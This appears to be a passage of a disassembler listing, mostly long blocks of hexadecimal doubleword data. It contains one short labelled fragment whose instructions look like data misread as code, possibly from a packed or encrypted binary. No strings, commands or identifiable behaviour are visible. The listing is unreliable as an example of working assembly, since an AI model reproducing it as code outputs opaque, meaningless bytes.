		dd 0D4F97A80h, 457D5DEBh, 33683B9Fh, 83C1DEECh,	0E75E2B1Fh
		dd 6D1C9C75h, 2A448CCDh
		dd 1ACA0D9Fh, 1485A9DBh, 72BD7D46h, 97C5C385h, 30E1B386h
		dd 5AC3FC92h, 0AB034DC0h, 0F73D5DB1h, 90CE2351h, 4BB06A4h
		dd 2A3F055Ah, 64988B6Ah, 1C0D154Ah, 0B2675F53h,	0D3072CB5h
		dd 77D4C875h, 147C341Bh, 0FDBAC50h, 0AF507B2Ch,	254EB50Dh
		dd 9A35992Ah, 0B4F5B594h, 0EB953A0h, 0AA806FBFh, 0F128E0CEh
		dd 958D156Fh, 0B01D6F5Dh, 3D2E6BB5h, 0E0B1FE6h,	0FDA20593h
		dd 65DD5B2Bh, 0A68E9B3Dh, 8BEFA92Ah, 3F1766E3h,	18DB0CF6h
		dd 16D4D964h, 9FE24455h, 0E758B1CFh, 0C34A051Fh, 0BDC8150h
		dd 0B11ADDAAh, 0F1C00DD1h, 9F5B53C1h, 5F9BC972h, 8FEC616Dh
		dd 7AF503F5h, 0C79835AEh, 3862339Eh, 6310B1Dh, 74B4AB82h
		dd 0FA65F659h, 0B90FFCDBh, 95199633h, 5C04C51Ah, 0FF77573Dh
		dd 4F9E98BAh, 0F122F715h, 87DA8DCBh, 0FF6999EEh, 523D368Ah
		dd 0F753B41Ch, 0B14DF69Fh
; ---------------------------------------------------------------------------

loc_487E58:				; DATA XREF: sub_44C304:loc_446A2Eo
		mov	edx, 0A5F0DD5Ah
		xlat
		mov	dh, al
		adc	ds:8962948Bh, ch
		pop	ecx
		shl	ch, 6Ch
		jmp	dword ptr [esi+eax*2]
; ---------------------------------------------------------------------------
		db 50h,	75h, 59h
		dd 2776F4FAh, 0DAC16C96h, 0B2471F89h, 65049D7Eh, 6739C66Eh
		dd 0B824AC62h, 137EDC09h, 67CB62D5h, 9FF5822Bh,	0A7303968h
		dd 0E0D4EE14h, 0E9A2251h, 0D1C65B7Dh, 5F32E476h, 0A85CBFCh
		dd 2AF493C1h, 834BF9D1h, 4D4B55A3h, 0B99C7DFBh,	479BF3B8h
		dd 0E7F75B4Ah, 83EB4390h, 35605723h, 42E0B5B1h,	6E9CDFD9h
		dd 7F54BA6Ah, 0A4812D11h, 37E15AF1h, 0AC5F0186h, 0F66605A5h
		dd 0D1BBCA21h, 1E9EE8CDh, 783D835h, 0F854AE5Eh,	46C126DBh
		dd 0A968136Dh, 32BA8C4Ch, 7E1ADA47h, 8F0BF497h,	0C2AFF221h
		dd 0D655390Eh, 10915BAFh, 18C57471h, 253E7B13h,	6DFA1DF8h
		dd 9CCDFC0Fh, 0E22FF4BBh, 63332D53h, 48833EB9h,	7BDB675Eh
		dd 821A04h, 0E1ABBA75h,	77664BE0h, 3EF7E114h, 0D976D0FCh
		dd 4C81ECB9h, 1508C785h, 0A4AD55EDh, 0CEACD7B6h, 5AD26EDFh
		dd 1F223F19h, 0FB812366h, 248A3BF3h, 586FF5B8h,	4395A98Bh
		dd 0C28B680Dh, 53AF743Eh, 97CEA3CEh, 98AC4C7Ch,	0BEA4DFEBh
		dd 581202F4h, 15558D20h, 69AFCDB7h, 6DAAEFD5h, 609CB86Fh
		dd 584E05Ch, 59B7B5EAh,	0B2383035h, 12FDE14Dh, 0D0F79664h
		dd 0AFF6A462h, 6972DB8Bh, 70BBD9DBh, 0B7BE3632h, 76E36EA6h
		dd 51ABE46h, 3E3A873h, 0FD34E601h, 0A6C5EC2Fh, 0F1C00CE3h
		dd 8BF09512h, 0EDA4A15Ah, 122AA7B7h, 925E91D9h,	5B86ECD9h
		dd 0F0E4B7EDh, 0A36EB1D3h, 0B2AA872Eh, 0CCFE913Eh, 0C8D23BD2h
		dd 0FF3556E5h, 0C0BBD30Eh, 64FE74Fh, 0B4E985FAh, 1B596AA4h
		dd 0A8A954EDh, 0E1B89452h, 5B29F090h, 0DDFFDFDDh, 5F484A57h
		dd 4F5636CAh, 0C0657069h, 0D0B79A6Bh, 0BB67F138h, 0D2430A7Bh
		dd 0B34C632Ch, 6BCA11A8h, 198F0FC2h, 418EAEC5h,	3D0623B8h
		dd 2DC8FEFEh, 0F4CEE22Ah, 2FABD1C9h, 552D62FFh,	0CCCD6E4Fh
		dd 0F7621D1Dh, 29FBABE4h, 4517CE43h, 0A1F4386Bh, 69E1AF27h
		dd 53751181h, 0C3B44BBBh, 0FE920317h, 85CF6B15h, 56D9A87Ch
		dd 6C4222ADh, 0DC7F4ECBh, 0DC38D1A0h, 57595DD9h, 84D19318h
		dd 431ACE80h, 23E9F28Ch, 2F0DDC6Ah, 0AFD30F87h,	0BFD16A8Dh
		dd 0CD0238CBh, 2731A0BFh, 0F9BB6C2Bh, 5F03F525h, 71744B16h
		dd 47EBD6D6h, 9831DC0Bh, 57749F84h, 5CF78A94h, 2324B088h
		dd 0F67DD181h, 0F35CC81Ah, 0A281ACB7h, 77A9FA9Eh, 425DD02Eh
		dd 1B12F8BFh, 542874FBh, 2936A6C7h, 2CB7497Dh, 934B8855h
		dd 0C1952DB1h, 0A98B8AA6h, 0A88B83F2h, 0CC91992Bh, 16EC62B8h
		dd 0A3311F78h, 4CA4BA2Bh, 71187AE9h, 29B695D7h,	0DE6B3CEBh
		dd 5237B394h, 83FE6EB2h, 0AF1AC816h, 0F0CDBD4h,	0B6FB064Dh
		dd 90AFBD0Ah, 0C30C7BD2h, 95D1AD4h, 99DF3D97h, 35F93B9Ch
		dd 9A396314h, 0B1C828BEh, 55BC36E5h, 155BD197h,	25C1C3F0h
		dd 2AEC1A5Eh, 6625E2C2h, 8CD2BB15h, 4C0CD29h, 917BCC91h
		dd 3DCEFFBCh, 87D26B8Eh, 8A1C9821h, 1C898FCFh, 79AB5393h
		dd 26E0B2F6h, 0F4BB9E1Fh, 62E4BFB8h, 6ADEAD12h,	6C4EB7E6h
		dd 423725D3h, 32435E9Ch, 0D57ED595h, 29F6EB3Dh,	0C1F35C08h
		dd 4385833Bh, 0E35547DFh, 37D06051h, 6B9304D3h,	7F255882h
		dd 503C834Ah, 0DE1E6FE0h, 9A27F16h, 0DFB33DF2h,	0E133DFB7h
		dd 0F6248D6h, 7B477AC2h, 5C5E7855h, 26142AF3h, 1CE720EFh
		dd 8601492Bh, 0BE8D9D86h, 607964A3h, 0ED9486CFh, 0D123938h
		dd 0C229F97Eh, 0A44027CDh, 1B075933h, 0F36879ECh, 8AAC7CDBh
		dd 0B334B6F0h, 0FEDA4E8Dh, 35CA567Ch, 14AEDB7Fh, 0F465CCAAh
		dd 0AD33749Fh, 48C4D22Fh, 0A95D163h, 165E3BA1h,	0C2F88DE0h
		dd 6C1114BDh, 3557E83Fh, 0F549F936h, 4F96ACB0h,	0A9FA734Ch
		dd 52F3F576h, 0B94AC703h, 75A26C63h, 0F634960Bh, 0BAE368E9h
		dd 725F83C8h, 0DB3CB6E6h, 533481FBh, 9570BDBCh,	9695A507h
		dd 3AB8A73Bh, 4D684675h, 93F6B70Bh, 17AAA49Fh, 0F062A67Ch
		dd 4AE02B54h, 557ADB59h, 0B7DCBC83h, 3327A680h,	0D89410AEh
		dd 0CCA95465h, 79E6C782h, 97DBCCC6h, 0B492ACC7h, 23A39EE7h
		dd 0FA07E926h, 3D8E4150h, 67A215D2h, 42993486h,	0FCB40A21h
		dd 0BBB79DC1h, 4CFEEE4Eh, 57EBE321h, 9FB7CAADh,	0F024B5Bh
		dd 9FF19E3Ch, 0ED1A9B85h, 6B296064h, 34E8CD13h,	6FA171F1h
		dd 24404365h, 0E7D78457h, 0FA1DE1C4h, 1F8FCDF2h, 52637F8Eh
		dd 0F1166825h, 4159A4h,	0F7C09483h, 0FE3E68Eh, 0ECFAC094h
		dd 0FFAC81E1h, 88AA1A25h, 15A215Dh, 0D5EA6534h,	575A0A99h
		dd 14DBC656h, 0BFE05B41h, 0F0987CF7h, 1F0A49FBh, 5DA1FB3Bh
		dd 820219F5h, 0DDDA247Dh, 7D72AE8h, 4AED9D36h, 7B1A84BFh
		dd 52D405FFh, 563E2786h, 0C345FD6Fh, 6CBE0917h,	1E1B0565h
		dd 98AE916h, 754366FCh,	562E5C15h, 1F810DABh, 0A6F30F8Ah
		dd 5701F8C3h, 0E0B70F46h, 1A318FE6h, 0B3760BF3h, 0AF9B7A94h
		dd 2E8D2338h, 9C3FEF7Bh, 9B7F2C87h, 0DC156BAFh,	0FF4C98A0h
		dd 0BDBF90FAh, 0F9B7C0F0h, 0C6226E0Eh, 82EADB7Eh, 77D345DDh
		dd 0AB483D15h, 0CAA41925h, 6B1086B2h, 7E154470h, 0DA055ABBh
		dd 70563A10h, 7B1BC2CAh, 1D4211CBh, 9DBDA5A3h, 0C488E35Dh
		dd 2E25D2ABh, 0A78B407Ah, 7C58F453h, 46CC8BE0h,	6BFFEC45h
		dd 0C5542B17h, 8502BB32h, 0B3DBFAD3h, 0BFA37340h, 0C3C3F5DFh
		dd 63ED17B6h, 0EBDC9D22h, 94D5B0FEh, 573323AFh,	52DCFFCFh
		dd 2EF65EA7h, 7D3E9E99h, 2DE51571h, 74B30A43h, 0BAF0558Dh
		dd 0A3874791h, 0C321BC0Fh, 0D0DEAEDh, 7053F8B8h, 36634F94h
		dd 9419B133h, 1229CBC3h, 2B19C1F4h, 0ECED8299h,	0ABFD34F2h
		dd 0C06CB210h, 0D65F48BFh, 4EFB2AFAh, 3B4B8B56h, 0DF6703ABh
		dd 0B19C154Dh, 922BA6F3h, 247F4E5Ch, 0BC76E328h, 8BBB30B4h
		dd 0E3AD95F3h, 0F5D3FFA9h, 0FBA57E96h, 6A237F39h, 4B75D25Ch
		dd 0CA8E5F28h, 0AC12160Ah, 55808D77h, 6E254D71h, 69D563C7h
		dd 69FCC6B4h, 18A5F4F5h, 93DDE14Bh, 5BF2B640h, 77D6E016h
		dd 6C864197h, 0AEBBCAFFh, 0E5C11D0Bh, 34FD41C1h, 5EA45DB7h
		dd 0DCF34E5Fh, 5FCB9E56h, 6B2E6D02h, 0E02DD90Ah, 0CBFB3825h
		dd 18CD0A11h, 0AFC39921h, 0CA9F3233h, 0AD271827h, 7E111362h
		dd 0FA4A96F7h, 0D3182F42h, 0A95A2BEh, 71B202BDh, 81A9A2B3h
		dd 0F2084519h, 4BB785AAh, 8A441ABDh, 0C109CCE5h, 2E98566h
		dd 0BB8BCFAEh, 29BD1CCBh, 0D0F1F9E6h, 9BF5B970h, 0C2BFCC64h
		dd 927016FEh, 89966CF6h, 0C6512BD6h, 0B28CBE3Fh, 1663950Bh
		dd 9EC43E5Eh, 752BC2BAh, 6AD76F57h, 0B88F0D26h,	6F22F4C5h
		dd 0AAA55975h, 0C7711F4Ah, 49D70895h, 89AFF109h, 0EDEA447Ah
		dd 1C9CD369h, 0AC5F3160h, 0BA126CA1h, 1C92906Fh, 0FDF805DEh
		dd 551B1181h, 9E6234D3h, 46E6DA05h, 8589609Fh, 739DF716h
		dd 0B24F344Ah, 22AA7550h, 9F93D5A2h, 8670B71Eh,	4349EA10h
		dd 0B8DAFC9Ah, 0F422CEBBh, 6181E7Dh, 0DA1B834Ch, 0D51F1749h
		dd 79B723A8h, 65E4A1CCh, 0AB3B4B94h, 0F63BA242h, 0BEC205A0h
		dd 0DDA09CCCh, 0EF6BFF8Eh, 0C3E052A4h, 0EC30419Ch, 0B9B2003Bh
		dd 5F3164Ah, 713F4AFCh,	0B0D31BA9h, 10FCCD6Dh, 0E8BF6531h
		dd 0B3014E7h, 0A25B10E5h, 0BBE231C4h, 0F97BA1B8h, 8DFED0C0h
		dd 543FC47Dh, 0F0A95F08h, 0B7E50D69h, 30F41F5Eh, 5CF0DD95h
		dd 0D1DEB9D8h, 1B516D56h, 9917A92h, 6897553Bh, 0FC3134DCh
		dd 0D525C2A0h, 0CDA826A2h, 9C4F026Dh, 3CCDFF96h, 55546C13h
		dd 4C626133h, 0B12D45EFh, 7C669CAh, 0F493D355h,	45F9E597h
		dd 1F0AFB25h, 0C49B4E15h
		dd 6ECD05E7h, 0D33C0A06h, 0E7A91721h, 0CD77BA57h, 0E93F6BF9h
		dd 0DDA079F6h, 179CA947h, 0F49ECD30h, 0F5C9BC91h, 0F3D50AE4h
		dd 0AD189287h, 0DCBA7984h, 7CCA7297h, 6111B2C0h, 4116756Fh
		dd 7655348Fh, 9D6BE429h, 422DF54Fh, 9A8BED00h, 0B53017EDh
		dd 0AE42DA69h, 0AB83FC77h, 356FD9F8h, 0E559204Ah, 57367CCh
		dd 1F08AEB8h, 4EFF4949h, 3AEF2C20h, 0FD5D03F7h,	0B6E588A2h
		dd 0A57C10D8h, 0B452783Ch, 83B78030h, 58EFFB8Ch, 0A62E594Ah
		dd 2956C851h, 0A02A7734h, 7D6AA89h, 860761EAh, 0E2DB130Eh
		dd 79D1F3FCh, 0BE25E7EDh, 6A7485F5h, 5189B58Eh,	0D6E836AFh
		dd 12BAD697h, 412D19C9h, 5F483E33h, 0CBC5F551h,	3254B831h
		dd 5543F217h, 5A38FBDDh, 553D28FAh, 0DADCF39Fh,	95FF9E61h
		dd 19F0A8DAh, 56D235F2h, 5B4BFF49h, 213B0F54h, 0C253B555h
		dd 1837610Fh, 0C09F282Dh, 0EA5455C6h, 1BF1BE8Eh, 0FFC072CEh
		dd 57742B0Bh, 0B203F241h, 964A9D9Ah, 5E993815h,	40C9F985h
		dd 0C1515171h, 9E0FA761h, 0BEAABDB9h, 1A9C3607h, 2BF5C8B8h
		dd 0CB9A0FC2h, 3479CBD8h, 0A5AED6Bh, 0DD5D955Ch, 0AA2D4DAAh
		dd 13455ED5h, 0A040397Ah, 7198C283h, 0EA61FB29h, 0A03A1AAh
		dd 88C847BEh, 25F95C1Bh, 0D154EB57h, 0A6DADEBAh, 89FC4F92h
		dd 25C7651Fh, 0E57C58B1h, 0CEB25117h, 0AF7F39C8h, 0CA7BD2DBh
		dd 816D0CA7h, 51ABF6BFh, 84ED5665h, 983ADA38h, 0C0FDBC37h
		dd 8E931319h, 23B9F33Bh, 571E1207h, 3DA36396h, 0A0DB836Eh
		dd 4C363DBDh, 94051C15h, 52BBBB53h, 0D914C835h,	2E257473h
		dd 3465E82Dh, 0AAF1D7C7h, 41929D24h, 0DBB36B5Ch, 17B820BDh
		dd 8767FDC4h, 31693ABEh, 7E514259h, 0D303A945h,	0CE7F2A74h
		dd 0FC69CEA7h, 89C433B2h, 517DEE8Eh, 66D05E09h,	337DCAA9h
		dd 55CCDA8Bh, 53351ECCh, 0E9F24AFFh, 0DA178FC8h, 7B335460h
		dd 0B5AB8777h, 0F5E3177Eh, 0DB954681h, 7AA722CFh, 0F9AF5527h
		dd 51F70DC0h, 2201B355h, 32C40C55h, 0F8CC77D0h,	0CAE0A62Ah
		dd 5915A4DAh, 0CE4B6A60h, 9116255Eh, 0DD40FF8Bh, 0BCB6B45Ah
		dd 0F4B5FD2Fh, 0FB3856ADh, 87C99544h, 7622275Ch, 0A2951D9Dh
		dd 0CA154A8Dh, 8A72D3D6h, 53189332h, 0EB2AA175h, 6249B42Eh
		dd 6C0FB4E9h, 97EDAB73h, 9A79EA8Dh, 482D349Eh, 0DF6332FFh
		dd 0F49CF2A4h, 0EA148FB5h, 0FB581CA9h, 993F863h, 0FFCAD631h
		dd 0BB235882h, 0A2F402C0h, 20BB7769h, 0C092142Dh, 2E7C2AA4h
		dd 1789EF8Eh, 7815D0D1h, 0D129FD4Bh, 453C29DAh,	0F8E55B2h
		dd 0EC9995DEh, 2A302F81h, 4E40DBF8h, 9318FC1Ch,	0FD6F2619h
		dd 86F8BBB4h, 6298493Eh, 0EC386E8Bh, 591B8DB7h,	98317926h
		dd 0BEEF6FF5h, 0B631271Bh, 0C3E388BFh, 0EB8AA1D2h, 359A7DACh
		dd 0CA55FB70h, 48F96BEAh, 12CA929Fh, 0CC1AFE4h,	209CFB5h
		dd 2E15DF7Ch, 8BAA8DF9h, 90D64D8Bh, 540EE9E2h, 0C7977ECEh
		dd 7E19ABDDh, 4E14F572h, 0CB9D3650h, 6FA62CD7h,	1853C693h
		dd 0A50466ADh, 665B4DF0h, 0FF68D31Bh, 0BED15A19h, 0D3E9161Fh
		dd 0FE1979D7h, 0E372B425h, 559C6FD4h, 8CEEE8E9h, 0B18B1D87h
		dd 37B33FB6h, 605BD3EDh, 0C3F16B66h, 0B3E75FE5h, 0D71BD6FCh
		dd 0A68CE0CCh, 2AA766B7h, 0AC0A4813h, 0D11FAAB4h, 6ED934EEh
		dd 5CE7CC32h, 0D6F6FB55h, 0A5308247h, 97C13A4Ch, 0C79FB702h
		dd 0C92EE38Fh, 80E51919h, 3786D271h, 0F53CAD91h, 9CA0F8D5h
		dd 55F0DC2Eh, 460EF5CDh, 0C37CCF61h, 0AE6E2AC8h, 0F07738AEh
		dd 46572DFEh, 0EAEF9DE1h, 0C6B583FBh, 92795BB7h, 3DD30FC7h
		dd 2CD5FD30h, 664EFFCFh, 5B6A8973h, 163A5180h, 6EC93130h
		dd 0BB6E8E95h, 0C7BE4AABh, 114329E1h, 0ECB15726h, 26B838E7h
		dd 1F87B777h, 5A5FFDEAh, 898BB6C3h, 23126A5Dh, 574F6C9Ah
		dd 38FBB6C9h, 8DEE3A64h, 0A6DB2B2Dh, 70D76528h,	0A1BAD109h
		dd 1A664020h, 9F552016h, 0D763C7C9h, 0AA53E36h,	0D2D16D1Fh
		dd 9AA30EFEh, 0F9B5C18Bh, 5E9B1E2Fh, 0B2633168h, 0F94C8795h
		dd 1B1D8BC8h, 0CF91E6C1h, 0DE1A9543h, 9461A585h, 0A579CF8Bh
		dd 59E2CC98h, 193B3027h, 74B40ECEh, 4C949793h, 70B86F62h
		dd 0EE92344Eh, 0C2A046DAh, 28263474h, 0C9917C9Ch, 0E30907E3h
		dd 69CDC1B1h, 373387E7h, 0E63FAD7Ah, 0C05BACFAh, 181E909Eh
		dd 5FB2D779h, 6F76DE1Eh, 0B026A781h, 5B636CE9h,	43473A17h
		dd 0E30A50AEh, 0C11A7FB3h, 580A4DA4h, 2C65DB9Eh, 400232B4h
		dd 0E515F1DEh, 0B0139A6Ch, 4EDE5380h, 0D667567Ah, 4E4A8667h
		dd 0EF429C92h, 0CC754119h, 5FC33C4Eh, 90A71097h, 0F4F1B83Dh
		dd 0E7A12D14h, 0B6401AC1h, 933FA762h, 936ACB99h, 8DC1B1CBh
		dd 30CB0607h, 0CBF38C7Dh, 23F0ECDEh, 27AC5C49h,	0B16A8B6Bh
		dd 0FD6C573Ch, 78164370h, 4315CECh, 880E7B05h, 0D90F5F65h
		dd 0E8EE5B67h, 0AF83EFBAh, 93D04468h, 39B77853h, 0B6B7F12Bh
		dd 0F62116D0h, 87986C18h, 7AABF82Bh, 9AB344FDh,	65A4445Dh
		dd 0EE21D4CBh, 0F4EB879Bh, 0BEC110E7h, 0C9C28945h, 0B4CEA172h
		dd 0FC802A6Bh, 6FB1591Fh, 5F35D95Ah, 533D50A8h,	27FB4696h
		dd 7AF8AD1Bh, 9C0D7C8Fh, 5C5B3563h, 3ADBBC97h, 41F5C2A7h
		dd 451F98D5h, 453CCB15h, 3EA76C65h, 968CB81Eh, 0A3C44211h
		dd 6BDF960h, 7F3A2D36h,	4FB41DA3h, 0D1BB8751h, 2FA339ADh
		dd 8EC0824Fh, 0CD35E89Ch, 2B172A44h, 81ECF090h,	0B6DF4785h
		dd 0C391D9A0h, 5A2DBBBh, 2ACA777h, 0DAFE5F35h, 416A00Ah
		dd 12658A21h, 2FBEE465h, 5D9DE159h, 21A0F220h, 46E34B59h
		dd 0B1EF81Eh, 0CEF1B8ADh, 0E2388A5h, 0F98DDA03h, 0A3B34366h
		dd 0D390B2ABh, 0A1F115Dh, 0AA926FBFh, 0EC54CE99h, 0DC855587h
		dd 0A9722D15h, 1225FBBCh, 0CB3606A9h, 7D6734ABh, 0B90F7F53h
		dd 0CB7EF09Ah, 0C5559C45h, 0AA7A35A9h, 8967FE96h, 0CEF4830Dh
		dd 9FC8CCBDh, 2B977A49h, 66B8CF9Bh, 0B63FC811h,	14A98BF7h
		dd 0C7D1F51Ch, 3F193BF8h, 999A2BDCh, 6900187Eh,	1EC36399h
		dd 5BF1ABD5h, 706C85BEh, 3C944FB4h, 4280EBF5h, 0F004A740h
		dd 8A42F695h, 0AADE3948h, 0B56955A2h, 0F9F4D9D8h, 33F661C5h
		dd 195B8BE7h, 6DE3A835h, 8324BBD1h, 9C17E888h, 0FF0E22B9h
		dd 5E8DCA34h, 597BBD16h, 0D2F67D76h, 27D16354h,	0BD322691h
		dd 0AE3EAA4h, 0BCD3A525h, 3713D099h, 0DB7BB82Ch, 0D96D3261h
		dd 0B1A3EA47h, 5F7EB2D0h, 777E41FEh, 58F62D53h,	3F64BD2Ah
		dd 1F53A15Fh, 66C9D14Ah, 46515449h, 0D06D5AE1h,	1813CAD0h
		dd 516F6651h, 0A1149E25h, 74DC5482h, 0D0FE89B4h, 746A15C0h
		dd 0A502F5D9h, 1673BE0Dh, 0B7D95CC7h, 356E606Dh, 0F0CA4ABAh
		dd 28D4CF81h, 0ED5D66FDh, 230BAE1Bh, 4405D006h,	8025A706h
		dd 656F88FEh, 381E2B18h, 8B34A5A3h, 0F965D737h,	0CC81DE17h
		dd 4E0324D9h, 97E17F5Dh, 9E0530D7h, 0C6E4EAEDh,	3074C3F6h
		dd 2D6998F8h, 4584C3Eh,	0F420E5B3h, 0D5E2082Fh,	0BF1B58F3h
		dd 3EEFB0EFh, 0A4E4E447h, 13FB2944h, 5ED13F13h,	0FADF0E85h
		dd 0BEE243A0h, 0E64E4664h, 0A2AB6651h, 7F1C0C37h, 38CEE989h
		dd 139E0580h, 22DB55ADh, 0CA96199Bh, 6B9D61CBh,	721DF73Fh
		dd 42EFFEDCh, 54CFF90Ch, 0B245FB0Bh, 924AF768h,	0F821DFBh
		dd 0DDD9D92Ch, 0BD199F31h, 1DB95B3Fh, 0FF778E7Ch, 4181BA7Ch
		dd 0CDDC7686h, 0BC65F77Ch, 0A31F216Ah, 0BFF4D9D8h, 7EFB6718h
		dd 9794D25Dh, 0A9EB2A71h, 50AE8A36h, 645F5AA9h,	89C47A38h
		dd 6A00543Bh, 49865047h
		dd 1067D4C5h, 31E0AE4Dh, 50EA948Eh, 50C87A0Ah, 0B3AB5833h
		dd 2F0F9186h, 0F30C7451h, 0D21C1D95h, 4DE5A7A0h, 703C6B9Ch
		dd 2BE58DFFh, 0D8A9BD26h, 2A89862Fh, 0F32A1DBCh, 0A3872DD9h
		dd 0C1B743C5h, 7C976562h, 92A59E03h, 0E3E1FC97h, 0C1F77587h
		dd 0E5428FD4h, 0C76CEB62h, 0A5178166h, 0D541F04Ch, 0DA9E093Ch
		dd 7E4A0AD4h, 0B4E4E787h, 9FD15360h, 0D15D663Eh, 956082F0h
		dd 0A4DA4049h, 0A4ADCFE5h, 0B339C4FFh, 0CC2F94C9h, 15F76DBEh
		dd 0CBF9984Bh, 0A269C539h, 0DE5C0E25h, 3EE11F9Dh, 667708EAh
		dd 6575550Ch, 9A767979h, 0EDCCAA37h, 5B47CCD2h,	1E554E8Dh
		dd 74E7B9B8h, 7BA6EA47h, 0FD53DA36h, 60302F5Ah,	0B0A387E0h
		dd 8B51D41Fh, 8F116B22h, 45E96B4Ch, 7715FFB9h, 0F3E3DB26h
		dd 5EF35733h, 73AB62E2h, 5EAD8A74h, 13A6C121h, 0B9D55A22h
		dd 0F43CCE92h, 3F9D639Ch, 0EDE96A9Eh, 7C35D34Dh, 0C4BA6765h
		dd 9ED3A1D8h, 2E0DD1B0h, 86CFB76Eh, 650A259Ch, 0E5182D5Ch
		dd 0AFECCA98h, 0C21F7021h, 0B959A4A5h, 59ACC1F0h, 9B58D018h
		dd 0BB13515Ah, 6E89A607h, 43F0CB2Fh, 0AB41AB9Dh, 7DCA1E7Bh
		dd 5846D3D5h, 0BD28F33Bh, 88836D56h, 6AE12A11h,	0E23C21CDh
		dd 1D392F9Eh, 85B4A333h, 0B25D755Ah, 0C6D99282h, 7C5A2B1h
		dd 0F3FB5E1Eh, 0A1E387C6h, 0FAD1AEFDh, 32BE4225h, 4ABAD9ADh
		dd 33F0D2E8h, 3F0AC4F6h, 219579B0h, 3B69CBFh, 284C02DCh
		dd 0F6867367h, 0F06896A2h, 0B5DD56D7h, 1F4F4FCFh, 0F8DE3E98h
		dd 9BD662A1h, 9D695FF1h, 0F5A3D6F0h, 0D721223Bh, 0FDEC4D8h
		dd 0CDAF7CFCh, 8738E965h, 0BCE3B15h, 9683BFA4h,	1D71F50Ch
		dd 0F5F1B5A9h, 279B667Ah, 0E0BFD945h, 9DE0C997h, 0DA4606DBh
		dd 0ED787E57h, 0A1689774h, 0E929BE12h, 0BFBB6568h, 8782C45Dh
		dd 0D2D6BB44h, 0E7FFFBCAh, 0E512CB9Ah, 0FC2AA7FBh, 0DA986DFh
		dd 66644BF9h, 1D2A51B4h, 13C9F9C5h, 7F531549h, 4B276F5Bh
		dd 0F8715D2Eh, 1C687E67h, 9125FBADh, 0CF84BBEh,	3BB84462h
		dd 47F51E93h, 0C9D0FDD5h, 32B51703h, 572A01ABh,	64019F77h
		dd 0A072FBD1h, 0F9855ACCh, 20C7238Eh, 0F220F61Bh, 8DC6D934h
		dd 5F932C9Dh, 62BB5B46h, 97FDE0E4h, 29D42061h, 20109392h
		dd 6AE9372Ah, 0FAD51667h, 0EBFA57Dh, 3EB078F6h,	79168FFFh
		dd 1BF342C6h, 0B13E8DC6h, 97EB1AC2h, 996366EFh,	6D450296h
		dd 8E17A44Ah, 22B0FC32h, 7E3B3559h, 5F9491A8h, 6FA2C96Fh
		dd 39DA447Fh, 0E1A3A9DAh, 3D5A3FECh, 826C1455h,	0FCFB5D55h
		dd 0D2DC9135h, 66A64FE1h, 0B253361Dh, 3D099307h, 0CB915C30h
		dd 8295DFBEh, 0A9361C5Ch, 4A5B3182h, 5B399495h,	0CAAD5115h
		dd 0F01B68C6h, 0A5A63EA5h, 35563C16h, 468E80BCh, 0BCA4790Bh
		dd 5F154C7Ah, 30DF647h,	0D9D7C971h, 0EB1F4E1Fh,	948B4CEAh
		dd 5E527761h, 2AB536E8h, 0CEBCD727h, 0EE506C1Eh, 3265CBDBh
		dd 35D91DB3h, 59CD1F22h, 0D785E198h, 0B2E92473h, 0AE7059ABh
		dd 70EF4F7Eh, 0CD3396EBh, 1CFCC682h, 8CFE98E5h,	0EBD6D56Dh
		dd 0D253F03Eh, 4C88F3E3h, 0B3698BA5h, 0E29B9E0Bh, 2CEE4931h
		dd 732F74FBh, 72734FC3h, 1C4BE2A8h, 1E5C8BB1h, 81F3F1BCh
		dd 35C65EA5h, 89B862F9h, 0F6856CEh, 221AA537h, 0DA558EC2h
		dd 96FB8069h, 73051DB1h, 0BFB8437Ch, 0E61D4321h, 4D1D25D9h
		dd 0BE385BECh, 981F55FDh, 9F780AACh, 2AC4C6E3h,	0EF2B67C1h
		dd 1195786Fh, 1E2DAA65h, 0AD0C7C9Ah, 540AB9C2h,	2CE254CBh
		dd 0DCCFD0ABh, 25C5FE9Ah, 24D0547Eh, 0D97A5D39h, 0DCF36078h
		dd 51BA71F1h, 0A56C507Eh, 68F25B18h, 65DBED46h,	0D63F5878h
		dd 0AB7387C2h, 0A462AA90h, 596F94B1h, 0F04B10CDh, 238D9B72h
		dd 0CC43C991h, 7094EB32h, 33032511h, 0D4246C6Fh, 7C28C2E9h
		dd 661F4595h, 0E356536Eh, 5D2D85F6h, 3FEA11A5h,	1CE28C0Ah
		dd 8C7FE528h, 441ABC68h, 7E28107Bh, 0B72D39ABh,	97F44F85h
		dd 37DD8590h, 475E58BEh, 0B933917Eh, 6AABE9C3h,	0C6880F43h
		dd 55B5CB1Ch, 5F79E212h, 0A9A05808h, 5B00A0D3h,	9AD19AF7h
		dd 523B6B66h, 244737D4h, 8A8E0B3Dh, 3F95FDE6h, 22F0C52Bh
		dd 68A6543Ah, 0CEB1E6B4h, 0B5C14D2Fh, 0B8CC2835h, 0FCE61DB3h
		dd 0AF68E55h, 219DD2D1h, 0C44B3806h, 0D6B35330h, 68392F38h
		dd 3F11245Dh, 2EE5AD24h, 7354FDFEh, 36C4B48Fh, 0DB202CBBh
		dd 22A369F0h, 0DE797F71h, 0A32A1EC6h, 0B40E8F84h, 913BF9ABh
		dd 4F1BFBF8h, 3E7AD0Bh,	78B4F7C3h, 0AA7834Dh, 61FE68Bh
		dd 0E2E80A96h, 46F7FC5Eh, 0BDE5AB13h, 0BD32CE38h, 0CCF4C1C6h
		dd 0F63D2217h, 64656BDCh, 7827090Fh, 1EEFFB04h,	0DE67A298h
		dd 0A75E47C7h, 0FE110D3Ah, 0D2FE02A8h, 0E3186662h, 0D0EB52BAh
		dd 8D629533h, 80DB5CE5h, 0C316DB78h, 0A2FDD94Bh, 7CABACE5h
		dd 9ECE2993h, 0E7D31036h, 3DD60919h, 66ED80B8h,	7631CC80h
		dd 609B1A9h, 8C51EBFBh,	673339B9h, 488D2F7Ch, 24040B30h
		dd 4607CB4Bh, 40A31C4Ch, 12F8D85Ch, 0D8A5AD20h,	0C52F703Fh
		dd 97AC2EF0h, 5096E9B8h, 26A83D0Eh, 4AFC3E79h, 0E1DE3300h
		dd 1A7A3DB7h, 0BDEDDF41h, 0A24521D3h, 0FE1CF997h, 20A00FC5h
		dd 152FA0D2h, 9D785345h, 0DCFC548Eh, 0F410BB52h, 2B975825h
		dd 878C650Fh, 0BA1B1779h, 9DA0E07Dh, 6DF3DCACh,	81F5FD63h
		dd 68B5E4AAh, 0FE0DF0B5h, 18EFB3C2h, 16B42CFFh,	18DA3024h
		dd 0F02AC831h, 63F0A1C1h, 4832960Dh, 0A5A3BEBDh, 6A25F9E9h
